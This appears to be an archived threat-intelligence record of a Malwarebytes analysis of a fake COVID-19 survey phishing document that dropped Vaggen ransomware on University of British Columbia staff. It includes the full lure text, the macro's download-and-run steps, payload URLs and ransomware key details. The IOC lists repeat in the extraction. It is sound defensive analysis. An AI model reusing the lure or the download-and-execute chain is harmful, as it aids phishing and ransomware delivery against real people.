3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3442 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3443 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3444 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3445 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3446 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3447 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3448 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3449 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3450 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3451 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3452 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3453 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we've observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam coming from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from the following URL and writes it as Polisen.exe:
  notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
- Downloads a file from the following URL and writes it as Killar.exe:
  notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
- Calls the VBA Shell function to execute killar.exe
- Checks the return value of Shell to see whether the launch succeeded (on success, Shell returns the task ID of the started program)
- If successful, it sends an HTTP GET request to:
  canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If it isn't successful, it sends an HTTP GET request to:
  canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document (and letting the macro run) triggers a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs.

This can be very useful as an early warning notification system that an intruder has had access to a network.
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go,\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (e.g. the content of the ransom note) are encrypted with XXTEA\r\n(using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming the files is implemented as the callback passed to the standard Go library function\r\nfilepath.Walk (package path/filepath).\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce\r\ngenerated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.\r\nThe output file (with the .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements (the hardcoded key, plus the nonce and tag stored in the file), we can recover encrypted files\r\nwithout having to pay the ransom. It appears that the malware author has not received any payment so far at this\r\nBitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that used a\r\nvery similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\nSource: 
https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/"
	],
	"report_names": [
		"fake-covid-19-survey-hides-ransomware-in-canadian-university-attack"
	],
	"threat_actors": [],
	"ts_created_at": 1775791215,
	"ts_updated_at": 1775791342,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/215d11eb1f4328ea10a9add6803aff006e3356e2.pdf",
		"text": "https://archive.orkl.eu/215d11eb1f4328ea10a9add6803aff006e3356e2.txt",
		"img": "https://archive.orkl.eu/215d11eb1f4328ea10a9add6803aff006e3356e2.jpg"
	}
}